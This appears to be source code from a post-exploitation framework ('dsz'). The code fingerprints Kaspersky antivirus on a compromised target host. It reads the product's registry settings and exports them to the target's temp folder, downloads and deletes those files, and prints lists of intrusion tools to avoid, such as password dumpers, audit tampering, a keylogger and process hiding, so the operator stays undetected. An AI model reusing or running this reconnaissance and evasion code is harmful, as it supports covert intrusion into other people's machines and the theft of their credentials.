shared.safePrint('| IT APPEARS TO BE INTERNET SECURITY...')
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
shared.safePrint('| THIS NEW VERSION OF THE KASPERSKY 2010 SCRIPT USES DATA RETRIEVED FROM THE')
shared.safePrint('| ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.')
shared.safePrint('| THIS MEANS THAT WE WILL CREATE TWO FILES ON TARGET, DOWNLOAD THEM, AND DELETE')
shared.safePrint('| THEM. PLEASE ENSURE THAT THE SCRIPT REMOVES THE FILES CORRECTLY.')
shared.safePrint('| GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 250K.')
shared.safePrint('| IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE')
shared.safePrint('| QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.ui.Pause('DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)')
(tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
tarTempDir = (tarWinDir + '\\temp')
kasOutFile = '~klset.dat'
dsz.control.echo.Off()
tempFileName = ''
for i in range(2):
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint(('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' % (tarTempDir, kasOutFile)))
shared.safePrint('|\t!!!SEEK HELP IMMEDIATELY!!! !!!BAILING FROM SCRIPT!!!')
shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.control.echo.On()
dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
dsz.control.echo.Off()
return False
else:
shared.safePrint('+---------------------------------------------------------------------------------')
if dsz.cmd.Run((((((('run -command "\\"' + kasRoot) + '\\avp.com\\" export rtp \\"') + tarTempDir) + '\\') + kasOutFile) + '\\"" -redirect')):
shared.safePrint(('| SUCCESSFULLY CREATED %s ON TARGET' % kasOutFile))
dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') + kasOutFile), dsz.RUN_FLAG_RECORD)
[getFile] = dsz.cmd.data.Get('filelocalname::localname', dsz.TYPE_STRING)
if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
shared.safePrint(('| SUCCESSFULLY DELETED %s FROM TARGET' % kasOutFile))
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint(('PLEASE CHECK THE STATUS OF THE FILE %s/%s ON TARGET!!!' % (tarTempDir, kasOutFile)))
else:
shared.safePrint(('| VERIFIED DELETION OF FILE %s\\%s FROM TARGET' % (tarTempDir, kasOutFile)))
if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile)) != True):
shared.safePrint('DIRECTORY LISTING FAILED')
dsz.control.echo.Off()
else:
shared.safePrint(('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
kasOutFile = '~klset.txt'
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.ui.Pause('PLEASE CHECK THE ABOVE DIRECTORY OUTPUTS TO ENSURE BOTH FILES WERE SUCCESSFULLY DELETED.')
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 9 (AKA 2010)...')
shared.safePrint(((('| ATTEMPTING TO OPEN FILE: ' + logDir) + '\\GetFiles\\') + getFile))
kasFilePtr = open(((logDir + '\\GetFiles\\') + getFile))
fwLevel = 0
fmLevel = 0
inRegGuard = 0
fireWallStatus = 'UNKNOWN'
allPortMonitoring = 'UNKNOWN'
fileSystemMonitor = 'UNKNOWN'
logRegEvents = 'UNKNOWN'
logNonCrit = 'UNKNOWN'
sysAccountWatch = 'UNKNOWN'
try:
for line in kasFilePtr:
if re.match('.*bWatchSystemAccount.*', line):
sysAccountWatch = 'ENABLED'
if re.match('.*no.*', line):
sysAccountWatch = 'DISABLED'
kasXmlFilePtr.write((('<sys_acc_watch>' + shared.xmlScrub(sysAccountWatch)) + '</sys_acc_watch>\n'))
if re.match('.*LogFiles.*', line):
fileSystemMonitor = 'ENABLED'
if re.match('.*no.*', line):
fileSystemMonitor = 'DISABLED'
kasXmlFilePtr.write((('<file_sys_logging>' + shared.xmlScrub(fileSystemMonitor)) + '</file_sys_logging>\n'))
if re.match('.*LogReg.*', line):
logRegEvents = 'ENABLED'
if re.match('.*no.*', line):
logRegEvents = 'DISABLED'
kasXmlFilePtr.write((('<reg_event_logging>' + shared.xmlScrub(logRegEvents)) + '</reg_event_logging>\n'))
if re.match('.*FullReport.*', line):
logNonCrit = 'ENABLED'
if re.match('.*no.*', line):
logNonCrit = 'DISABLED'
kasXmlFilePtr.write((('<noncrit_event_logging>' + shared.xmlScrub(logNonCrit)) + '</noncrit_event_logging>\n'))
if re.match('.*[+].*Firewall.$.*', line):
fwLevel = 1
if ((1 == fwLevel) and re.match('.*enabled.*', line)):
if re.match('.*no.*', line):
fireWallStatus = 'DISABLED'
else:
fireWallStatus = 'ENABLED'
kasXmlFilePtr.write((('<firewall_status>' + shared.xmlScrub(fireWallStatus)) + '</firewall_status>\n'))
fwLevel = 0
if re.match('.*AllPorts.*', line):
if re.match('.*yes.*', line):
allPortMonitoring = 'ENABLED'
else:
allPortMonitoring = 'DISABLED'
if re.match('.*vRuleList_vcontent.*', line):
splitFw = line.split(' ')
fwActionBlock = splitFw[2]
m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?', line)
if m:
fwRules = m.group(1)
shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
if re.match('.*[+].*Resource.$.*', line):
inRegGuard = 1
if (re.match('.*Childs_vcontent.*', line) and (inRegGuard == 1)):
shared.lateKasRegRules(line, kasXmlFilePtr)
inRegGuard = 0
if re.match('.*4b4c41707054727573746564.*', line):
shared.lateKasAppRules(line, kasXmlFilePtr)
if re.match('.*Ports_vcontent.*', line):
shared.lateKasPortMon(line, kasXmlFilePtr)
kasXmlFilePtr.write((('<allport_monitoring>' + allPortMonitoring) + '</allport_monitoring>'))
shared.safePrint('+----------------------------------------------------------------------------------+')
shared.safePrint('| GENERAL PSP STATUS: |')
shared.safePrint('+----------------------------------------------------------------------------------+')
shared.safePrint(('| FIREWALL IS: %s' % fireWallStatus))
shared.safePrint(('| PORT MONITORING ON ALL PORTS IS: %s' % allPortMonitoring))
shared.safePrint(('| FILE SYSTEM MONITORING: %s' % fileSystemMonitor))
shared.safePrint(('| SYSTEM ACCOUNT WATCHING IS: %s' % sysAccountWatch))
shared.safePrint(('| NON-CRITICAL EVENT LOGGING IS: %s' % logNonCrit))
shared.safePrint(('| LOGGING OF REGISTRY EVENTS IS: %s' % logRegEvents))
shared.safePrint('+----------------------------------------------------------------------------------+')
finally:
kasFilePtr.close()
finally:
kasXmlFilePtr.write('</kaspersky_settings>\n')
kasXmlFilePtr.close()
return True
def kasVerSix(kasName, kasDescription, kasVersion, kasRoot):
doNotRun = '| YAK'
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS.')
shared.safePrint('| THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
shared.safePrint('| A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
shared.safePrint('+------------------------------------+-------+------------------------------------')
dsz.control.echo.Off()
shared.safePrint(('| %s %s %s' % (shared.padOutput(30, 'SETTING'), '| VALUE', '| STATUS')))
shared.safePrint('+------------------------------------+-------+------------------------------------')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles -recursive'
if (not dsz.cmd.Run(regGetCmd)):
shared.safePrint('!!!RECURSIVE REGISTRY QUERY FAILED!!!')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking -value enabled'
regLabel = 'BEHAVIOR BLOCKING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Anti_Hacker\\profiles\\fw -value enabled'
regLabel = 'FIREWALL STATUS:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
regValue = shared.basicRegquery(regGetCmd)
kasXmlFilePtr.write('\t<setting>\n\t\t<setting_name>Firewall Protection Level</setting_name>\n')
if (regValue == '1'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | !!!HIGH SECURITY!!! (THIS IS BAD)' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>High Security</setting_value>\n\t</setting>\n')
elif (regValue == '2'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | !!!TRAINING MODE!!! (THIS IS BAD)' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>Training Mode</setting_value>\n\t</setting>\n')
elif (regValue == '3'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | LOW SECURITY' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>Low Security</setting_value>\n\t</setting>\n')
elif (regValue == '4'):
shared.safePrint(('| FIREWALL PROTECTION: | %s | OFF' % regValue))
kasXmlFilePtr.write('\t\t<setting_value>off</setting_value>\n\t</setting>\n')
else:
kasXmlFilePtr.write('\t\t<setting_value>Unknown</setting_value>\n\t</setting>\n')
shared.safePrint(('FIREWALL PROTECTION: | %s | (!!!UNKNOWN!!!)' % regValue))
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bWatchSystemAccount'
regLabel = 'SYSTEM ACCOUNT WATCHING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bBehaviourEnabled'
regLabel = 'APP ACTIVITY MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings -value bRegMonitoring_Enabled'
regLabel = 'REGISTRY MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| POKING HOLES IN THE FIREWALL')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0000 -value bEnabled'
regLabel = 'DANGEROUS BEHAVIOR MONITOR:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0002 -value bEnabled'
regLabel = 'PROCESS INJECTION PROTECTION:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| RUNASCHILD, RUNASSYSTEM, PWDUMP, OR MODIFYAUDIT')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0003 -value bEnabled'
regLabel = 'PROCESS HIDING PROTECTION:'
regValue = shared.basicRegquery(regGetCmd)
if (regValue == '1'):
doNotRun = (doNotRun + '\n| HIDING PROCESSES')
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Behavior_Blocking\\profiles\\pdm\\settings\\Set\\0007 -value bEnabled'
regLabel = 'KEYLOGGER DETECTION:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\Web_Monitoring\\profiles\\httpscan\\ -value enabled'
regLabel = 'HTTP PORT LOGGING:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\TrafficMonitor\\settings\\ -value DecodeSSL'
regLabel = 'DECODE SSL:'
regValue = shared.basicRegquery(regGetCmd)
outputBinData(regLabel, regValue, kasXmlFilePtr)
shared.safePrint('+------------------------------------+-------+------------------------------------')
shared.safePrint('| PORT MONITORING:')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\TrafficMonitor\\settings\\def\\ports\\ -recursive'
if dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD):
regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
portValue = ''
portDesc = ''
portEnabled = ''
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('| | PORT | DESCRIPTION |MONITORED|')
shared.safePrint('| +--------+----------------------+---------+')
kasXmlFilePtr.write('\t<monitored_ports>\n')
for i in range(len(regName)):
if (regName[i] == 'enabled'):
portValue = regValue[(i - 3)]
portDesc = regValue[(i - 2)]
if (regValue[i] == '1'):
portEnabled = 'TRUE'
kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
else:
portEnabled = 'FALSE'
for j in range(6):
if (len(portValue) < 6):
portValue = (portValue + ' ')
else:
break
for j in range(20):
if (len(portDesc) < 20):
portDesc = (portDesc + ' ')
else:
break
for j in range(7):
if (len(portEnabled) < 7):
portEnabled = (portEnabled + ' ')
else:
break
shared.safePrint(('| | %s | %s | %s |' % (portValue, portDesc, portEnabled)))
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('+---------------------------------------------------------------------------------')
kasXmlFilePtr.write('\t</monitored_ports>\n')
kasXmlFilePtr.write('</kaspersky_settings>\n')
else:
shared.safePrint('PORT MONITORING REGISTRY QUERY FAILED')
shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint(doNotRun)
shared.safePrint('+---------------------------------------------------------------------------------')
return True
def kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot):
doNotRun = '| RUNNING PWDUMP OR MODIFYAUDIT IF YOU ARE AN EXECUTABLE'
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS MP4.')
shared.safePrint('| THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
shared.safePrint('| A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.control.echo.Off()
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles -recursive'
dsz.cmd.Run(regGetCmd)
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
shared.safePrint((((((((('| ' + shared.padOutput(40, 'IDS RULE DESCRIPTION')) + ' | ') + shared.padOutput(10, 'STATUS')) + ' | ') + shared.padOutput(10, 'LOGGING')) + ' | ') + shared.padOutput(10, 'ACTION')) + '|'))
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\regguard2'
if shared.compRegQuery(regGetCmd, 'REGISTRY GUARD', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| LISTENING ON TARGET PORTS\n| RUNNING HANDLE\n| UNINSTALLING YAK OR DARKSKYLINE')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0015'
if shared.compRegQuery(regGetCmd, 'SUSPICIOUS DNS REQUEST PROTECTION', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| RUNNING NETMAP IF YOU ARE AN EXECUTABLE')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0000'
shared.compRegQuery(regGetCmd, 'P2P WORM PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0001'
shared.compRegQuery(regGetCmd, 'TROJAN PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0002'
if shared.compRegQuery(regGetCmd, 'KEY LOGGER PROTECTION', kasXmlFilePtr):
doNotRun = (doNotRun + '\n| RUNNING YAK')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0003'
shared.compRegQuery(regGetCmd, 'HIDDEN DRIVER PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0004'
shared.compRegQuery(regGetCmd, 'KERNEL MODIFICATION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0005'
shared.compRegQuery(regGetCmd, 'HIDDEN OBJECT PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0006'
shared.compRegQuery(regGetCmd, 'HIDDEN PROCESS PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0008'
shared.compRegQuery(regGetCmd, 'FILE MODIFICATION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0010'
shared.compRegQuery(regGetCmd, 'PROCESS INTRUSION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0011'
shared.compRegQuery(regGetCmd, 'IO REDIRECTION PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0012'
shared.compRegQuery(regGetCmd, 'SUSPICIOUS REGISTRY ACCESS PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0013'
shared.compRegQuery(regGetCmd, 'DATA XFER USING TRUSTED APP PROTECTION', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0014'
shared.compRegQuery(regGetCmd, 'SUSPICIOUS SYSTEM ACTIVITY MONITOR', kasXmlFilePtr)
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\0016'
shared.compRegQuery(regGetCmd, 'PROTECTED STORAGE ACCESS PROTECTION', kasXmlFilePtr)
shared.safePrint('+------------------------------------------+------------+------------+-----------+')
shared.safePrint('| FIREWALL SETTINGS')
shared.safePrint('+--------------------------------------------------------------------------------+')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\ -value enabled'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
if ('0' == regValue[0]):
shared.safePrint('| FIREWALL STATUS: DISABLED')
elif ('1' == regValue[0]):
shared.safePrint('| FIREWALL STATUS: ENABLED')
else:
shared.safePrint('| FIREWALL STATUS: UNKNOWN')
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
if (regValue[0] == '1'):
fwSetting = 'HIGH'
elif (regValue[0] == '2'):
fwSetting = 'TRAINING MODE'
elif (regValue[0] == '2'):
fwSetting = 'TRAINING MODE'
elif (regValue[0] == '3'):
fwSetting = 'LOW'
elif (regValue[0] == '4'):
fwSetting = 'OFF'
else:
fwSetting = 'UNKNOWN'
shared.safePrint(('| PROTECTION LEVEL: %s (%s)' % (fwSetting, regValue[0])))
regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\TrafficMonitor\\settings\\Ports\\ -recursive'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
try:
regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
except:
regName = ''
regVal = ''
shared.safePrint('+--------------------------------------------------------------------------------+')
shared.safePrint('| !!!ERROR CHECKING TrafficMonitor (PORT) SETTINGS; PROCEED WITH CAUTION!!!')
shared.safePrint('+--------------------------------------------------------------------------------+')
portValue = ''
portDesc = ''
portEnabled = ''
shared.safePrint('| PORT MONITORING:')
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('| | PORT | DESCRIPTION |MONITORED|')
shared.safePrint('| +--------+----------------------+---------+')
kasXmlFilePtr.write('\t<monitored_ports>\n')
for i in range(len(regName)):
if (regName[i] == 'Description'):
portValue = regValue[(i - 1)]
portDesc = regValue[i]
if (regValue[(i - 2)] == '1'):
portEnabled = 'TRUE'
kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
else:
portEnabled = 'FALSE'
for j in range(6):
if (len(portValue) < 6):
portValue = (portValue + ' ')
else:
break
for j in range(20):
if (len(portDesc) < 20):
portDesc = (portDesc + ' ')
else:
break
for j in range(7):
if (len(portEnabled) < 7):
portEnabled = (portEnabled + ' ')
else:
break
shared.safePrint(('| | %s | %s | %s |' % (portValue, portDesc, portEnabled)))
shared.safePrint('| +--------+----------------------+---------+')
shared.safePrint('+--------------------------------------------------------------------------------+')
kasXmlFilePtr.write('<kaspersky_settings>\n')
shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
shared.safePrint('+--------------------------------------------------------------------------------+')
shared.safePrint(doNotRun)
shared.safePrint('+--------------------------------------------------------------------------------+')
return True
def main():
scriptVer = '1.0.0.6'
logDir = dsz.lp.GetLogsDirectory()
sysPid = 0
usrPid = 0
kasName = 'UNKNOWN'
kasDescription = 'UNKNOWN'
kasVersion = 'UNKNOWN'
kasName = 'UNKNOWN'
kasDescription = 'UNKNOWN'
kasVersion = 'UNKNOWN'
kasType = 'UNKNOWN'
kasVerSplit = 'UNKNOWN'
kasSubVersion = 'UNKNOWN'
kasRoot = 'UNKNOWN'
kasSubVersion = 'UNKNOWN'
getFile = ''
isWorkstation = False
isInternetSec = False
dbFile = (logDir + '\\target.db')
con = sqlite3.connect(dbFile)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT NAME, DESCRIPTION, VERSION from applications where DESCRIPTION LIKE '%kaspersky%'")
kasAppQuery = cur.fetchall()
cur.execute("SELECT NAME, USER, PID, PATH from processlist where NAME like '%avp.exe'")
kasProcQuery = cur.fetchall()
cur.close
con.close
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
myProc = shared.myProc()
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| YOUR TARGET APPEARS TO BE RUNNING A KASPERSKYISH PSP!')
shared.safePrint('| FOLLOW WIKI GUIDELINES BASED ON VERSION AND TYPE LISTED BELOW!')
shared.safePrint(('| PLEASE REMEMBER YOUR PROCESS IS: ' + myProc))
shared.safePrint(('| SCRIPT VERSION: ' + scriptVer))
shared.safePrint('+---------------------------------------------------------------------------------')
if (2 != len(kasProcQuery)):
shared.safePrint('| I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE PROC TABLE QUERY RESULTS...')
shared.safePrint(('| THERE SHOULD BE 2 PROCESSES RUNNING; I SEE %d!!!' % len(kasProcQuery)))
for a in range(len(kasProcQuery)):
shared.safePrint(('| %s\t\t%s\t\t%s' % (kasProcQuery[a][1], kasProcQuery[a][0], kasProcQuery[a][2])))
if (0 == len(kasProcQuery)):
shared.safePrint('| NONE- WHY IS THIS SCRIPT RUNNING?!?!?!!?!?!')
shared.safePrint('| I AM EXITING BECAUSE I DO NOT THINK YOU HAVE KASPERSKY!')
shared.safePrint('+---------------------------------------------------------------------------------')
return False
elif (1 == len(kasProcQuery)):
shared.safePrint('| I ONLY SEE ONE PROCESS RUNNING- THIS MAY BE BECAUSE NO USER IS LOGGED IN')
shared.safePrint('| REGARDLESSS, THIS IS NOT NORMAL, AND IF THIS IS KAS 2010 OR 2011 STOP NOW!')
else:
shared.safePrint('| ADDITIONAL PROCESSES MAY BE DUE TO THE PRESENCE OF')
shared.safePrint('| AN UPDATE SERVER ON THIS BOX...')
shared.safePrint('+---------------------------------------------------------------------------------')
if (not dsz.ui.Prompt('ARE YOU SURE YOU WANT TO CONTINUE?', False)):
return False
if (1 != len(kasAppQuery)):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE APP TABLE QUERY RESULTS...')
shared.safePrint(('| THERE SHOULD BE 1 APPLICATION INSTALLED; I SEE %d:' % len(kasAppQuery)))
for a in range(len(kasAppQuery)):
shared.safePrint(('| %s' % kasAppQuery[a][0]))
if (0 == len(kasAppQuery)):
shared.safePrint('| THERE ARE NO MATCHES...')
shared.safePrint('| CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS IN RUSSIAN...')
else:
shared.safePrint('| YOU HAVE MULTIPLE KASPERSKY APPLICATIONS...')
shared.safePrint('| CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS AN UPDATE SERVER...')
shared.safePrint('| I HAVE FAILED TO FINGERPRINT WITH THE PRIMARY TECHNIQUE...')
if dsz.ui.Prompt('WOULD YOU LIKE ME TO TRY AND FINGERPRINT USING REG KEYS (SECONDARY TECHNIQUE)?', True):
shared.safePrint('| QUERYING REGISTRY...')
dsz.control.echo.Off()
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
regCmd = 'registryquery -hive L -key software\\KasperskyLab'
shared.safePrint('FAILED FIRST REGQUERY')
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
regName = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING)
numInstalls = 0
for i in range(len(regName)):
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*6.*', regName[i])):
numInstalls += 1
